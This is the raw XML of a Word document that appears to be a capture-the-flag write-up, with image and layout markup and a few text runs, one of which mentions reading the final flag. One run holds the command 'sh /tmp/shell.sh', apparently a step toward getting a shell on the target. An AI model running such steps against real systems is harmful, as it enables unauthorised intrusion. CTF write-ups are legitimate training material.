            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="84" name="image35.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image35.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:srcRect b="38297" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="178668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A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49500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86"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sh /tmp/shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">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A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27300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="83"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89200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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just read the final flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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82800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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headerReference r:id="rId45" w:type="default"/>
      <w:headerReference r:id="rId46" w:type="first"/>
      <w:headerReference r:id="rId47" w:type="even"/>
      <w:footerReference r:id="rId48" w:type="default"/>
      <w:footerReference r:id="rId49" w:type="first"/>
      <w:footerReference r:id="rId5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4">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="10"/>
    <w:bookmarkEnd w:id="1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91" name="image30.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image30.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B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B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4.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0.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image10.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Quarkus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41.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image41.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38.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xm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footer" Target="footer1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.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3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><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1.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><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22.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><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2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0.jpg"/><Relationship Id="rId2"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41.png"/></Relationships>
</file>

<file path=word/_rels/header3.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U/XnpYnJQ8NnwwfaCZw/RnAbEg==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnI3cDg1N3VzdDhsMzIOaC5rbmtkd2RkZG5yc2QyDmgubXJmbW90M3Z4dXU0Mg5oLmJrOGFmNGdpdmU5bTIOaC4zOGR0dTBhYnkwNTUyDmgub3E1ZjU5Y3gwYzZ1Mg5oLjE3NWY1Y3M5NHowbzgAciExSTItaExabUhYRG9aeXNSUzlJcExCSjJpMlZyWHcxb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